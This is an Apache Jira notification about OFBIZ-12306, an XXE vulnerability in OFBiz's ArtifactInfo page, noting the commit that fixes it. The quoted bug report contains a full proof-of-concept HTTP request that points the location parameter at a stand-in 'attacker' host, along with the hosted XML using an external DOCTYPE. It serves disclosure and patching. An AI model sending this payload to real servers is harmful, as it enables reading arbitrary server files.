[jira] [Commented] (OFBIZ-12306) Found a new XXE (XML External Entity Injection) vulnerability in ArtifactInfo

Mon, 13 Sep 2021 00:31:11 -0700 


    [ 
https://issues.apache.org/jira/browse/OFBIZ-12306?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17413963#comment-17413963
 ] 

ASF subversion and git services commented on OFBIZ-12306:
---------------------------------------------------------

Commit 24c72edc4ca87f0357edb774e7f8a3a1a5305063 in ofbiz-framework's branch 
refs/heads/release18.12 from Jacques Le Roux
[ https://gitbox.apache.org/repos/asf?p=ofbiz-framework.git;h=24c72ed ]

Fixed: Found a new XXE (XML External Entity Injection) vulnerability in 
ArtifactInfo (OFBIZ-12306)

The XXE vulnerability can read arbitrary files on the server.

Thanks: thiscodecc for reporting this security issue (post-auth)


> Found a new XXE (XML External Entity Injection) vulnerability in ArtifactInfo
> -----------------------------------------------------------------------------
>
>                 Key: OFBIZ-12306
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12306
>             Project: OFBiz
>          Issue Type: Bug
>    Affects Versions: 17.12.08
>            Reporter: thiscodecc
>            Assignee: Jacques Le Roux
>            Priority: Major
>              Labels: security
>
> The http packet is as follows:
> POST /webtools/control/ArtifactInfo HTTP/1.1
> Host: 127.0.0.1:8443
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:91.0) 
> Gecko/20100101 Firefox/91.0
> Accept: 
> text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
> Accept-Encoding: gzip, deflate
> Referer: https://127.0.0.1:8443/webtools/control/ArtifactInfo
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 76
> Origin: https://127.0.0.1:8443
> Connection: close
> Cookie: JSESSIONID=E5591794A3BE924E307356FCA2B0A1A6.jvm1; 
> OFBiz.Visitor=10103; CookiePreferences=[]; login_username=admin; 
> login_nickname=admin; 
> UM_distinctid=178a633ad075a3-0853063891be59-445b6f-13c680-178a633ad087e9; 
> displayTagDiv=false; Hm_lvt_e325e60ca4cd358f2b424f5aecb8021a=1621261771; 
> careyshop-1.8.4-uuid=admin; careyshop-1.8.4-block=false
> Upgrade-Insecure-Requests: 1
> Sec-Fetch-Dest: document
> Sec-Fetch-Mode: navigate
> Sec-Fetch-Site: same-origin
> Sec-Fetch-User: ?1
> name=x&location=[http://attacker:8111/2.xml&type=request&submitButton=Lookup]
>  
> The content of the 2.xml file of the attacker's http service is as follows:
>  
> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE Quan SYSTEM 
> "http://127.0.0.1:12311/vlab.dtd";><xml-body></xml-body>
> The XXE vulnerability can read arbitrary files on the server.
>  
>  
>  
>  



--
This message was sent by Atlassian Jira
(v8.3.4#803005)

Reply via email to